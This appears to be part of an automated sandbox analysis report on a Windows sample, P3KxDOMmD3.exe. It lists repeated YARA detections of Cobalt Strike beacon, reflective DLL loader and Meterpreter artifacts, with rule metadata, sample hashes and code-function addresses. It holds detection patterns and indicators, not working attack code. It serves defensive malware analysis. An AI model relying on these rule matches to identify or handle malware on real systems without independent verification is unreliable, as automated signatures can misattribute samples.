            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
            Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00692078 CreateProcessWithLogonW,0_2_00692078
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001C59140_2_001C5914
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001C19280_2_001C1928
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001A916C0_2_001A916C
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001C12640_2_001C1264
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001CAAB00_2_001CAAB0
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001B03340_2_001B0334
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001C03740_2_001C0374
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001C239C0_2_001C239C
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001CC3970_2_001CC397
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001BF5A80_2_001BF5A8
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001CE6000_2_001CE600
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001ACE3C0_2_001ACE3C
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001A96800_2_001A9680
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001CC6800_2_001CC680
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001B6F380_2_001B6F38
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001CB7B00_2_001CB7B0
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001CCFF00_2_001CCFF0
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_006801A80_2_006801A8
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0066DA3C0_2_0066DA3C
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0068F2000_2_0068F200
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0066A2800_2_0066A280
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0068D2800_2_0068D280
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00677B380_2_00677B38
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0068DBF00_2_0068DBF0
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0068C3B00_2_0068C3B0
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00669D6C0_2_00669D6C
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_006825280_2_00682528
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_006865140_2_00686514
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00681E640_2_00681E64
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0067867C0_2_0067867C
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0068B6B00_2_0068B6B0
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00680F740_2_00680F74
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00670F340_2_00670F34
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00682F9C0_2_00682F9C
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0068CF970_2_0068CF97
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
            Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
            Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
